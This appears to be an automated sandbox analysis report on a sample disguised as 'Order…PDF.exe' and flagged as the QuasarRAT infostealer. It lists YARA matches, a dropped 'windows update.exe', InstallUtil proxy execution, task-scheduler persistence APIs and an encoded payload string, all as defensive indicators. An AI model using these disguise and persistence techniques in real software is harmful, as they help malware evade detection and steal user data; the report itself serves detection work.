Source: 0.2.Order88983273293729387293828PDF.exe.3d11660.3.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 0.2.Order88983273293729387293828PDF.exe.3d11660.3.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_QuasarStealer author = ditekshen, description = Detects Quasar infostealer, clamav_sig = MALWARE.Win.Trojan.QuasarStealer
Source: 2.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: 2.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 2.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_QuasarStealer author = ditekshen, description = Detects Quasar infostealer, clamav_sig = MALWARE.Win.Trojan.QuasarStealer
Source: 0.2.Order88983273293729387293828PDF.exe.3d11660.3.raw.unpack, type: UNPACKEDPE | Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: 0.2.Order88983273293729387293828PDF.exe.3d11660.3.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 0.2.Order88983273293729387293828PDF.exe.3d11660.3.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_QuasarStealer author = ditekshen, description = Detects Quasar infostealer, clamav_sig = MALWARE.Win.Trojan.QuasarStealer
Source: 0.2.Order88983273293729387293828PDF.exe.7230000.8.raw.unpack, ITaskFolder.cs | Task registration methods: 'RegisterTaskDefinition', 'RegisterTask'
Source: 0.2.Order88983273293729387293828PDF.exe.7230000.8.raw.unpack, TaskFolder.cs | Task registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
Source: 0.2.Order88983273293729387293828PDF.exe.7230000.8.raw.unpack, Task.cs | Task registration methods: 'RegisterChanges', 'CreateTask'
Source: 0.2.Order88983273293729387293828PDF.exe.7230000.8.raw.unpack, TaskService.cs | Task registration methods: 'CreateFromToken'
Source: Order88983273293729387293828PDF.exe, -.cs | Base64 encoded string: 'Lxg7aNd9UjMtet51HxUhc9w+PRI7ed9yEBhzW9dkOQ88bstRDxItcdB8BVovecZPOhQkcPxxEQRzc8JPNQ8tbcdxEAg8ZYl3GRUXUNd+GxUgJ/V1CDUxbNdWDg4lVNN+GA0tJ9V1CD4Gfd91RygmeNdoMwdzTtdxGDI8btt+G1oJeNYrGwQ8Q+J/Dwg8dd1+RwYtaO1TCRM6edxkOA4lfdt+RzItaPZxCABzKYsgRVoJb8F1EQMkZeF1DhctbolDFQw4cNdRDxItcdB8BSQwbN5/DgQ6J9BxHgQkat8rDwwnd9dkGRI8'
Source: 0.2.Order88983273293729387293828PDF.exe.7230000.8.raw.unpack, TaskPrincipal.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Order88983273293729387293828PDF.exe.7230000.8.raw.unpack, TaskFolder.cs | Security API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 0.2.Order88983273293729387293828PDF.exe.7230000.8.raw.unpack, User.cs | Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
Source: 0.2.Order88983273293729387293828PDF.exe.7230000.8.raw.unpack, TaskSecurity.cs | Security API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
Source: 0.2.Order88983273293729387293828PDF.exe.7230000.8.raw.unpack, TaskSecurity.cs | Security API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
Source: 0.2.Order88983273293729387293828PDF.exe.7230000.8.raw.unpack, Task.cs | Security API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: classification engine | Classification label: mal100.troj.evad.winEXE@10/6@1/1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\AppData\Roaming\SubDir
Source: C:\Users\user\AppData\Roaming\SubDir\windows update.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1436:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5832:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2796:120:WilError_03
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\3302836a-f2f9-4646-981e-42b54ed610dd
Source: Order88983273293729387293828PDF.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: Order88983273293729387293828PDF.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: Order88983273293729387293828PDF.exe, 00000000.00000002.2218488393.0000000002881000.00000004.00000800.00020000.00000000.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000002.2230725648.0000000003891000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: SELECT TOP 0 * FROM {0};
Source: Order88983273293729387293828PDF.exe, 00000000.00000002.2218488393.0000000002881000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: SELECT @(Model.ZZZ_Index) AS ZZZ_Index, 'Deleted' AS "$action", @(Model.PreOutput) FROM @(Model.DestinationTableName) WHERE @(Model.PrimaryKeyStagingJoin);
Source: Order88983273293729387293828PDF.exe, 00000000.00000002.2218488393.0000000002881000.00000004.00000800.00020000.00000000.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000002.2230725648.0000000003891000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: SELECT @(Model.ZZZ_Index) AS ZZZ_Index, 'Deleted' AS "$action", @(Model.PreOutput) FROM @(Model.DestinationTableName) WHERE @(Model.PrimaryKeyStagingJoin);UPDATE @(Model.DestinationTableName) SET @(Model.UpdateSetStagingNames) WHERE @(Model.PrimaryKeyStagingJoin);SELECT @(Model.ZZZ_Index) AS ZZZ_Index, 'Inserted' AS "$action", @(Model.PostOutput) FROM @(Model.DestinationTableName) WHERE @(Model.PrimaryKeyStagingJoin);
Source: Order88983273293729387293828PDF.exe, 00000000.00000002.2218488393.0000000002881000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: SELECT @(Model.ZZZ_Index) AS ZZZ_Index, 'Inserted' AS "$action", @(Model.PostOutput) FROM @(Model.DestinationTableName) WHERE ROWID = last_insert_rowid();
Source: Order88983273293729387293828PDF.exe, 00000000.00000000.2128066751.0000000000452000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: SELECT @countGroupBy AS [countGroupBy], @count AS [count]PDELETE FROM @(Model.TemporaryTableName);RDELETE FROM @@(Model.TemporaryTableName);
Source: Order88983273293729387293828PDF.exe, 00000000.00000002.2218488393.0000000002881000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: SELECT @(Model.ZZZ_Index) AS ZZZ_Index, 'Deleted' AS "$action", @(Model.PreOutput) FROM @(Model.DestinationTableName) WHERE @(Model.PrimaryKeyStagingJoin);DELETE FROM @(Model.DestinationTableName) WHERE @(Model.PrimaryKeyStagingJoin);
Source: Order88983273293729387293828PDF.exe, 00000000.00000002.2218488393.0000000002881000.00000004.00000800.00020000.00000000.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000002.2230725648.0000000003891000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE @(Model.TemporaryTableName) ( @(Model.TemporaryTableColumnCreate) CONSTRAINT PK_@(Model.TemporaryTableNamePK) PRIMARY KEY CLUSTERED ( ZZZ_Index ASC) );
Source: Order88983273293729387293828PDF.exe, 00000000.00000002.2218488393.0000000002881000.00000004.00000800.00020000.00000000.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000002.2230725648.0000000003891000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE @(Model.TemporaryTableName) ( @(Model.TemporaryTableColumnCreate) CONSTRAINT [PK_@(Model.TemporaryTableNamePK)] PRIMARY KEY CLUSTERED ( ZZZ_Index ASC) );
Source: Order88983273293729387293828PDF.exe, 00000000.00000002.2230725648.0000000003891000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE @(Model.TemporaryTableName) ( @(Model.TemporaryTableColumnCreate) CONSTRAINT PK_@(Model.TemporaryTableNamePK) PRIMARY KEY CLUSTERED ( ZZZ_Index ASC) );-Ambiguous invocation of indexer in type '{0}'
Source: Order88983273293729387293828PDF.exe, 00000000.00000002.2218488393.0000000002881000.00000004.00000800.00020000.00000000.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000000.2128066751.0000000000452000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: SELECT @(Model.ZZZ_Index) AS ZZZ_Index, 'Inserted' AS "$action", @(Model.PostOutput) FROM @(Model.DestinationTableName) WHERE (@(Model.PrimaryKeyStagingJoinMerge)) OR ROWID = last_insert_rowid();
Source: Order88983273293729387293828PDF.exe, 00000000.00000002.2218488393.0000000002881000.00000004.00000800.00020000.00000000.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000002.2230725648.0000000003891000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: SELECT TOP 0 @(Model.TemporaryColumnNames) INTO @(Model.TemporaryTableName) FROM (SELECT 1 AS ZZZ_Index) AS A LEFT JOIN @(Model.DestinationTableName) AS B ON 1 = 2;
Source: Order88983273293729387293828PDF.exe, 00000000.00000002.2218488393.0000000002881000.00000004.00000800.00020000.00000000.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000002.2230725648.0000000003891000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: UPDATE @(Model.DestinationTableName) SET @(Model.UpdateSetStagingNames) WHERE @(Model.PrimaryKeyStagingJoin);SELECT @(Model.ZZZ_Index) AS ZZZ_Index, 'Inserted' AS "$action", @(Model.PostOutput) FROM @(Model.DestinationTableName) WHERE @(Model.PrimaryKeyStagingJoin);
Source: Order88983273293729387293828PDF.exe, 00000000.00000002.2218488393.0000000002881000.00000004.00000800.00020000.00000000.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000000.2128066751.0000000000452000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: UPDATE @(Model.DestinationTableName) SET @(Model.UpdateSetStagingNames) WHERE @(Model.PrimaryKeyStagingJoin);
Source: Order88983273293729387293828PDF.exe, 00000000.00000002.2218488393.0000000002881000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: SELECT @(Model.ZZZ_Index) AS ZZZ_Index, 'Inserted' AS "$action", @(Model.PostOutput) FROM @(Model.DestinationTableName) WHERE (@(Model.PrimaryKeyStagingJoin)) OR ROWID = last_insert_rowid();
Source: Order88983273293729387293828PDF.exe, 00000000.00000000.2128066751.0000000000452000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: INSERT INTO @(Model.DestinationTableName) ( @(Model.InsertColumnNames) ) VALUES ( @(Model.InsertStagingNames) );
Source: Order88983273293729387293828PDF.exe, 00000000.00000000.2128066751.0000000000452000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: CREATE TABLE @(Model.TemporaryTableName) ( @(Model.TemporaryTableColumnCreate) );
Source: Order88983273293729387293828PDF.exe, 00000000.00000002.2218488393.0000000002881000.00000004.00000800.00020000.00000000.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000002.2230725648.0000000003891000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: SELECT * FROM {0} LIMIT 0;
Source: Order88983273293729387293828PDF.exe | ReversingLabs: Detection: 36%
Source: unknown | Process created: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe "C:\Users\user\Desktop\Order88983273293729387293828PDF.exe"
Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Process created: C:\Users\user\AppData\Roaming\SubDir\windows update.exe "C:\Users\user\AppData\Roaming\SubDir\windows update.exe"
Source: C:\Users\user\AppData\Roaming\SubDir\windows update.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Users\user\AppData\Roaming\SubDir\windows update.exe "C:\Users\user\AppData\Roaming\SubDir\windows update.exe"
Source: C:\Users\user\AppData\Roaming\SubDir\windows update.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Users\user\AppData\Roaming\SubDir\windows update.exe "C:\Users\user\AppData\Roaming\SubDir\windows update.exe"
Source: C:\Users\user\AppData\Roaming\SubDir\windows update.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Process created: C:\Users\user\AppData\Roaming\SubDir\windows update.exe "C:\Users\user\AppData\Roaming\SubDir\windows update.exe"
Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe | Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe | Section loaded: dhcpcsvc.dll
Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe | Section loaded: amsi.dll
Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe | Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe | Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe | Section loaded: rasapi32.dll
Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe | Section loaded: rasman.dll
Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe | Section loaded: rtutils.dll
Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe | Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe | Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe | Section loaded: secur32.dll
Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe | Section loaded: schannel.dll
Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe | Section loaded: mskeyprotect.dll
Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe | Section loaded: ncryptsslp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: wtsapi32.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: winsta.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: windows.storage.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: wldp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: msasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: ntmarta.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\SubDir\windows update.exe | Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\SubDir\windows update.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\SubDir\windows update.exe | Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\SubDir\windows update.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\SubDir\windows update.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\SubDir\windows update.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\SubDir\windows update.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\SubDir\windows update.exe | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\SubDir\windows update.exe | Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\SubDir\windows update.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\SubDir\windows update.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\SubDir\windows update.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\SubDir\windows update.exe | Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\SubDir\windows update.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\SubDir\windows update.exe | Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\SubDir\windows update.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\SubDir\windows update.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\SubDir\windows update.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\SubDir\windows update.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\SubDir\windows update.exe | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\SubDir\windows update.exe | Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\SubDir\windows update.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\SubDir\windows update.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\SubDir\windows update.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\SubDir\windows update.exe | Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\SubDir\windows update.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\SubDir\windows update.exe | Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\SubDir\windows update.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\SubDir\windows update.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\SubDir\windows update.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\SubDir\windows update.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\SubDir\windows update.exe | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\SubDir\windows update.exe | Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\SubDir\windows update.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\SubDir\windows update.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\SubDir\windows update.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: Order88983273293729387293828PDF.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: Order88983273293729387293828PDF.exe | Static PE information: Virtual size of .text is bigger than: 0x100000
Source: Order88983273293729387293828PDF.exe | Static file information: File size 1484800 > 1048576
Source: Order88983273293729387293828PDF.exe | Static PE information: Raw size of .text is bigger than: 0x100000 < 0x169e00
Source: Order88983273293729387293828PDF.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e | source: Order88983273293729387293828PDF.exe, 00000000.00000002.2230725648.000000000392B000.00000004.00000800.00020000.00000000.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000002.2218488393.0000000002E9A000.00000004.00000800.00020000.00000000.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000002.2254840027.0000000007230000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb | source: Order88983273293729387293828PDF.exe, 00000000.00000002.2230725648.000000000392B000.00000004.00000800.00020000.00000000.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000002.2218488393.0000000002E9A000.00000004.00000800.00020000.00000000.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000002.2254840027.0000000007230000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: InstallUtil.pdb\rvr hr_CorExeMainmscoree.dll | source: InstallUtil.exe, 00000002.00000002.2238847838.0000000001676000.00000004.00000020.00020000.00000000.sdmp, windows update.exe, 00000003.00000000.2232242455.0000000000472000.00000002.00000001.01000000.00000007.sdmp, windows update.exe.2.dr
Source: Binary string: protobuf-net.pdbSHA256}Lq | source: Order88983273293729387293828PDF.exe, 00000000.00000002.2230725648.0000000003BE8000.00000004.00000800.00020000.00000000.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000002.2254165352.0000000006A40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: protobuf-net.pdb | source: Order88983273293729387293828PDF.exe, 00000000.00000002.2230725648.0000000003BE8000.00000004.00000800.00020000.00000000.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000002.2254165352.0000000006A40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: InstallUtil.pdb | source: InstallUtil.exe, 00000002.00000002.2238847838.0000000001676000.00000004.00000020.00020000.00000000.sdmp, windows update.exe, 00000003.00000000.2232242455.0000000000472000.00000002.00000001.01000000.00000007.sdmp, windows update.exe.2.dr

Data Obfuscation
                  Source: Order88983273293729387293828PDF.exe, -.cs | .Net Code: _E009 System.Reflection.Assembly.Load(byte[])
                  Source: 0.2.Order88983273293729387293828PDF.exe.6a40000.7.raw.unpack, TypeModel.cs | .Net Code: TryDeserializeList
                  Source: 0.2.Order88983273293729387293828PDF.exe.6a40000.7.raw.unpack, ListDecorator.cs | .Net Code: Read
                  Source: 0.2.Order88983273293729387293828PDF.exe.6a40000.7.raw.unpack, TypeSerializer.cs | .Net Code: CreateInstance
                  Source: 0.2.Order88983273293729387293828PDF.exe.6a40000.7.raw.unpack, TypeSerializer.cs | .Net Code: EmitCreateInstance
                  Source: 0.2.Order88983273293729387293828PDF.exe.6a40000.7.raw.unpack, TypeSerializer.cs | .Net Code: EmitCreateIfNull
                  Source: 0.2.Order88983273293729387293828PDF.exe.7230000.8.raw.unpack, ReflectionHelper.cs | .Net Code: InvokeMethod
                  Source: 0.2.Order88983273293729387293828PDF.exe.7230000.8.raw.unpack, XmlSerializationHelper.cs | .Net Code: ReadObjectProperties
                  Source: 0.2.Order88983273293729387293828PDF.exe.42c8d30.1.raw.unpack, TypeModel.cs | .Net Code: TryDeserializeList
                  Source: 0.2.Order88983273293729387293828PDF.exe.42c8d30.1.raw.unpack, ListDecorator.cs | .Net Code: Read
                  Source: 0.2.Order88983273293729387293828PDF.exe.42c8d30.1.raw.unpack, TypeSerializer.cs | .Net Code: CreateInstance
                  Source: 0.2.Order88983273293729387293828PDF.exe.42c8d30.1.raw.unpack, TypeSerializer.cs | .Net Code: EmitCreateInstance
                  Source: 0.2.Order88983273293729387293828PDF.exe.42c8d30.1.raw.unpack, TypeSerializer.cs | .Net Code: EmitCreateIfNull
                  Source: Yara match | File source: 0.2.Order88983273293729387293828PDF.exe.68c0000.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.2.Order88983273293729387293828PDF.exe.40d6ed0.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.2.Order88983273293729387293828PDF.exe.3d11660.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 00000000.00000002.2218488393.0000000002998000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000000.00000002.2252532940.00000000068C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000000.00000002.2230725648.0000000003BE8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: Process Memory Space: Order88983273293729387293828PDF.exe PID: 7092, type: MEMORYSTR
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe | Code function: 0_2_04895F00 push 28B8247Fh; ret 0_2_04895F06
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe | Code function: 0_2_072C3DC3 push edx; ret 0_2_072C3DC4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\AppData\Roaming\SubDir\windows update.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\InstallUtil.exe.log
